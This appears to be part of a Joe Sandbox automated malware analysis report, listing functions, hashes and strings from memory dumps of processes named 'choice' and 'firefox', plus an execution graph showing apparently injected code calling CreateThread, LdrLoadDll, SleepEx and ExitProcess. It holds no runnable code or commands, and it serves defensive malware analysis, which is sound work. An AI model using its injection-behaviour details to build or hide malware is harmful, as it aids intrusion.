                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 1e10c754a3f8aab4f5d2705ea87afa9f8cf40f665dba12b33eb7b2d24b50c7da
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 9E022471508341AFD308CF1AC590A6FBBF5EFD8714F84892DB9A98B260DB31E905CB52
                                                                                                              Function 04A5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: c270e29be5aba435950901623efe2febc2012562fd0789203554596fe6f220e4
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 34819070E062499EDF248F68CA917BEBBB1AF45312F184559DC61A76F1D734B8408B70
                                                                                                              Function 04AC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: acffac4a32e5dd639adf3941903b5bc7ca4e74941a8edaa43ca1a33c0c87c748
                                                                                                              • Instruction ID: cb8ded44bb9f69a7b90065ac8b5cdc4496bed3242bc6fc47e5fbcab46e162d17
                                                                                                              • Opcode Fuzzy Hash: acffac4a32e5dd639adf3941903b5bc7ca4e74941a8edaa43ca1a33c0c87c748
                                                                                                              • Instruction Fuzzy Hash: 4E213177E01119ABDB51EFA9D940AAEB7F8EF54744F45016AED05E3240E730A9018BA1
                                                                                                              Function 04A3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04A802BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04A802E7
                                                                                                              • RTL: Re-Waiting, xrefs: 04A8031E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 4fc8f60d7b5a845c17859878da3306c217d187c5a32eda83b7b465fa9f4c0354
                                                                                                              • Instruction ID: 0f96430e63009b9f022f7afeb6751a06ed6481815b4d4ad9b9f0f58e5f8b4cfc
                                                                                                              • Opcode Fuzzy Hash: 4fc8f60d7b5a845c17859878da3306c217d187c5a32eda83b7b465fa9f4c0354
                                                                                                              • Instruction Fuzzy Hash: D2E1B071A187419FD725DF28C984B2AB7E0FB88324F144A5DF5A58B2E0E774F849CB42
                                                                                                              Function 04A4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 04A87B8E
                                                                                                              • RTL: Re-Waiting, xrefs: 04A87BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04A87B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 830b10187f8eebcdaf7a54dac324cfc5283bdcc4251bcaf6ff11edf802c44a54
                                                                                                              • Instruction ID: 32f48d98f0dc3eb5aa5bc9a64abeff0bbe1aa09804aa4844a5b55d4dbd1f1008
                                                                                                              • Opcode Fuzzy Hash: 830b10187f8eebcdaf7a54dac324cfc5283bdcc4251bcaf6ff11edf802c44a54
                                                                                                              • Instruction Fuzzy Hash: 7541BD353017029FDB24DF29CD41B6AB7E5EBC8724F100A2DE95ADB680DB31F9058BA1
                                                                                                              Function 04A4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A8728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 04A872A3
                                                                                                              • RTL: Re-Waiting, xrefs: 04A872C1
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04A87294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: dea11314677e5eca111605d1a2dba2fff7d3b6fdba535537ba46841c78c33679
                                                                                                              • Instruction ID: a5571d763075b964aac7e7bdd0fa98e139373815befb4a1d9076af1ee524a917
                                                                                                              • Opcode Fuzzy Hash: dea11314677e5eca111605d1a2dba2fff7d3b6fdba535537ba46841c78c33679
                                                                                                              • Instruction Fuzzy Hash: 3C41CF36700206AFEB20EF25CD41B6AB7A5FB84714F200619F955EB640EB31F8528BE1
                                                                                                              Function 04AC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: a91c0b8493c068fd3f9da8b7b52408fb9e89f4eee740d36a7b3105f669d6bd88
                                                                                                              • Instruction ID: ac7a9788f11db7363651c93c808e6740714432437f0c22618e54c7219831daa4
                                                                                                              • Opcode Fuzzy Hash: a91c0b8493c068fd3f9da8b7b52408fb9e89f4eee740d36a7b3105f669d6bd88
                                                                                                              • Instruction Fuzzy Hash: CC316473A002199FDB60DF29DD40BEEB7B8EB44714F44459AE849E3240EB30BA548FA1
                                                                                                              Function 048C39EE Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951551008.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_48c0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,$82?*$9$7.$;r~<$r~:;
                                                                                                              • API String ID: 0-3609984755
                                                                                                              • Opcode ID: 80b8583e03af771b33589e52385bfd7e76328a28b2880d175564c6cb31d9f703
                                                                                                              • Instruction ID: 983c5b696800c01a1715bba1c2bc9429ff99ef054c6b7380ac0b06a09c65ef5b
                                                                                                              • Opcode Fuzzy Hash: 80b8583e03af771b33589e52385bfd7e76328a28b2880d175564c6cb31d9f703
                                                                                                              • Instruction Fuzzy Hash: 9CF0B430018B949BD708AF10D448EA67BE4FF8A309FC05B5DF489DB111DA79DA468B86
                                                                                                              Function 04A57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: e98a4fb10b156e81390d8220e245c1a79c7b40081029d1ee43ea20d263234045
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: 3D91B179E002169FEF24DF69CA80ABEB7B5AF44320F54451AEC55F72E0E734A940CB60
                                                                                                              Function 04A19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_49e0000_choice.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: c1dc7c74d5f769a4d636a90baab1b941c5181a9443d3b47f222549d9cd8afd13
                                                                                                              • Instruction ID: 52023a3fa1526457686c0a2c37735bd5347c51610f877df90935257d701437d9
                                                                                                              • Opcode Fuzzy Hash: c1dc7c74d5f769a4d636a90baab1b941c5181a9443d3b47f222549d9cd8afd13
                                                                                                              • Instruction Fuzzy Hash: 5B810DB2D012699BDB35DF54CD44BEEB7B8AB08714F0041DAE919B7250E770AE84DF60

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:4.4%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:43
                                                                                                              Total number of Limit Nodes:4
                                                                                                              execution_graph 5202 1badb83915b 5203 1badb83916d 5202->5203 5204 1badb839008 2 API calls 5203->5204 5205 1badb839172 5204->5205 5210 1badb828761 5211 1badb828779 5210->5211 5212 1badb82882d 5211->5212 5213 1badb8288f9 CreateThread 5211->5213 5195 1badb83917f 5196 1badb839184 5195->5196 5199 1badb839008 5196->5199 5198 1badb839189 5200 1badb834f68 2 API calls 5199->5200 5201 1badb83901d 5200->5201 5201->5198 5206 1badb82887e 5207 1badb828884 5206->5207 5208 1badb828927 5207->5208 5209 1badb8288f9 CreateThread 5207->5209 5214 1badb834f5f 5215 1badb834f71 5214->5215 5216 1badb834f76 5215->5216 5217 1badb828888 CreateThread 5215->5217 5218 1badb835048 5215->5218 5217->5218 5218->5216 5219 1badb8350b6 ExitProcess 5218->5219 5174 1badb832902 5175 1badb832930 5174->5175 5176 1badb832934 5175->5176 5177 1badb832970 LdrLoadDll 5175->5177 5177->5176 5178 1badb839008 5181 1badb834f68 5178->5181 5180 1badb83901d 5183 1badb834f71 5181->5183 5182 1badb834f76 5182->5180 5183->5182 5185 1badb835048 5183->5185 5187 1badb828888 5183->5187 5185->5182 5186 1badb8350b6 ExitProcess 5185->5186 5188 1badb8288ae 5187->5188 5189 1badb828927 5188->5189 5190 1badb8288f9 CreateThread 5188->5190 5189->5185 5190->5185 5191 1badb8294b7 5194 1badb8294d4 5191->5194 5192 1badb82956d 5193 1badb8294fb SleepEx 5193->5194 5194->5192 5194->5193

                                                                                                              Executed Functions

                                                                                                              Function 000001BADB828761 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6dd29ad9aacdc2860fb49854d899649d772ecc0fcfcd065333c638bb3e9719e
                                                                                                              • Instruction ID: 4791de4a73d5311643ca3514a60c6d8cf3a66f759e03df61e59036f76f6fa22e
                                                                                                              • Opcode Fuzzy Hash: c6dd29ad9aacdc2860fb49854d899649d772ecc0fcfcd065333c638bb3e9719e
                                                                                                              • Instruction Fuzzy Hash: 505169322187458EEB159A78D4913EEBBE0FF5D310F89096DD496CB9D3DB268442C742
                                                                                                              Function 000001BADB834F5F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 347a13435c7f47cb4bd3d641f41ed67b8d8756f54f41119ec61586b8897191f2
                                                                                                              • Instruction ID: 13110e47557ccdee4dc856c0d9e14ea0a61f9e027e1052e5821aeb7784f4242c
                                                                                                              • Opcode Fuzzy Hash: 347a13435c7f47cb4bd3d641f41ed67b8d8756f54f41119ec61586b8897191f2
                                                                                                              • Instruction Fuzzy Hash: 97419E30714A484AEBA4BBA484967DD72D1FF9C300FD40979A84AC7BC3DB35D8448B53
                                                                                                              Function 000001BADB8294B7 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: e5d5344516f46b3e81ea50842ef477338357dbc782aafa192d6f0a2f948ed59a
                                                                                                              • Instruction ID: 14195fea55949827660336ae0a1a46c91d7428ca0ca8e653419d1751ad30b4e9
                                                                                                              • Opcode Fuzzy Hash: e5d5344516f46b3e81ea50842ef477338357dbc782aafa192d6f0a2f948ed59a
                                                                                                              • Instruction Fuzzy Hash: BD210B30714A198FEB95EB6880D57ED72D0FF69700FC505BEE58AC65CBCB2488818686
                                                                                                              Function 000001BADB82887E Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 8753b0ec0e1895fe7b64e0b8d5929eea9c437e27af0331dd583a33202b4251b6
                                                                                                              • Instruction ID: 05d8d10db54385a8215231d2cc18d8ac503f9f02525d5ecdcf5d18d57e058bac
                                                                                                              • Opcode Fuzzy Hash: 8753b0ec0e1895fe7b64e0b8d5929eea9c437e27af0331dd583a33202b4251b6
                                                                                                              • Instruction Fuzzy Hash: 4911E530224A054BFB45AF68C48A3DAB3E1FF5C304F850539D819CB6D9DB7984428B52
                                                                                                              Function 000001BADB832902 Relevance: 1.6, APIs: 1, Instructions: 54libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 10991c725ebc5ca467907168f1613dc24b379703bb66119adb9008cbe50dc9b3
                                                                                                              • Instruction ID: dfa3fe11d93ab61350fbbe95556b42a50c97767beb46a554f859b5b845bab2b0
                                                                                                              • Opcode Fuzzy Hash: 10991c725ebc5ca467907168f1613dc24b379703bb66119adb9008cbe50dc9b3
                                                                                                              • Instruction Fuzzy Hash: 70015231318A094BE754EB74C4997EBB3E0FF9C304F840529A88DC26D1EB39D644C742
                                                                                                              Function 000001BADB828888 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2493902075.000001BADB7B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000001BADB7B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_1badb7b0000_firefox.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 1e4df429d26f78e91e6556a3025b62049a28ce1a09f8d99d8591f285986e6a9c
                                                                                                              • Instruction ID: faa09c08d8daedb5e0b07849be300d31133b44596d05200c561792a7e83eaefd
                                                                                                              • Opcode Fuzzy Hash: 1e4df429d26f78e91e6556a3025b62049a28ce1a09f8d99d8591f285986e6a9c
                                                                                                              • Instruction Fuzzy Hash: 5211C030214A098BFB45EF68C4893AAB3E1FF9C304F85457ED469CB6DADB79C4418B52